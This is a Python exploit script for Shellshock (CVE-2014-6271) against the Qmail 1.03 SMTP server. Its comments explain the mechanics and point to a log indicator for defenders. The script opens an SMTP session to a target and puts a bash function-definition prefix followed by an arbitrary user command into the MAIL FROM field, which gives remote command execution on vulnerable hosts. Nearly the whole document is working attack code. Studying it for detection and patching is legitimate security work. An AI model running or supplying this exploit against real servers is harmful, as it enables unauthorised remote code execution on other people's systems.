# Exploit Title: Qmail SMTP 1.03 - Bash Environment Variable Injection
# Date: 2020-07-03
# Exploit Author: 1F98D
# Original Authors: Mario Ledo, Mario Ledo, Gabriel Follon
# Version: Qmail 1.03
# Tested on: Debian 9.11 (x64)
# CVE: CVE-2014-6271
# References:
# http://seclists.org/oss-sec/2014/q3/649
# https://lists.gt.net/qmail/users/138578
#
# Qmail is exposed to Shellshock (CVE-2014-6271) because it does not validate
# the MAIL FROM field.
#
#!/usr/local/bin/python3
from socket import *
import sys
# Flat script: argument parsing, then a scripted SMTP session against
# TARGET:25. The only unusual element is the MAIL FROM envelope address,
# which carries a bash function-definition prefix ("() { :; };") followed
# by CMD -- the CVE-2014-6271 (Shellshock) pattern named in the header.
# Defensive reading: the substring "() {" inside an SMTP envelope address
# is the indicator worth alerting on in MTA logs, and a bash patched for
# CVE-2014-6271 stops parsing after the imported function definition, so
# the trailing text is never executed.
if len(sys.argv) != 4:
    # Exactly three positional arguments are required; anything else
    # prints usage and exits non-zero.
    print('Usage {} <target ip> <email adress> <command>'.format(sys.argv[0]))
    print("E.g. {} 127.0.0.1 'root@debian' 'touch /tmp/x'".format(sys.argv[0]))
    sys.exit(1)

TARGET = sys.argv[1]  # host or IP of the SMTP server
MAILTO = sys.argv[2]  # envelope recipient used in RCPT TO
CMD = sys.argv[3]     # text placed after the "() { :; };" prefix in MAIL FROM

# Plain TCP to port 25. No timeout is set, so every recv() below can block
# indefinitely if the server stops answering, and the socket is never
# closed explicitly -- it is released only at interpreter exit.
s = socket(AF_INET, SOCK_STREAM)
s.connect((TARGET, 25))

# Banner check. str(res) on a bytes object yields its repr ("b'220 ...'"),
# so the substring tests work but the echoed text carries the b'' wrapper.
# recv(1024) returns at most 1024 bytes, so a multi-line reply could be
# split across reads -- presumably fine for a one-line 220 banner.
res = s.recv(1024)
if 'ESMTP' not in str(res):
    print('[!] No ESMTP detected')
    print('[!] Received {}'.format(str(res)))
    print('[!] Exiting...')
    sys.exit(1)

print('[*] ESMTP detected')
# HELO handshake; a 250 reply is required to continue.
s.send(b'HELO x\r\n')
res = s.recv(1024)
if '250' not in str(res):
    print('[!] Error connecting, expected 250')
    print('[!] Received: {}'.format(str(res)))
    print('[!] Exiting...')
    sys.exit(1)

print('[*] Connected, sending payload')
# The doubled braces are str.format escapes; the literal on the wire is
# "MAIL FROM:<() { :; }; <CMD>>". A 250 here only means the MTA accepted
# the envelope address syntactically -- it says nothing about whether CMD
# ran on the far side, which this script cannot observe.
s.send(bytes("MAIL FROM:<() {{ :; }}; {}>\r\n".format(CMD), 'utf-8'))
res = s.recv(1024)
if '250' not in str(res):
    print('[!] Error sending payload, expected 250')
    print('[!] Received: {}'.format(str(res)))
    print('[!] Exiting...')
    sys.exit(1)

print('[*] Payload sent')
# Complete a minimal message transaction: RCPT TO, DATA, a one-line body
# terminated by ".", then QUIT. Replies from here on are read but not
# checked, so any failure at this stage is silent and "[*] Done" is
# printed regardless.
s.send(bytes('RCPT TO:<{}>\r\n'.format(MAILTO), 'utf-8'))
s.recv(1024)
s.send(b'DATA\r\n')
s.recv(1024)
s.send(b'\r\nxxx\r\n.\r\n')
s.recv(1024)
s.send(b'QUIT\r\n')
s.recv(1024)
print('[*] Done')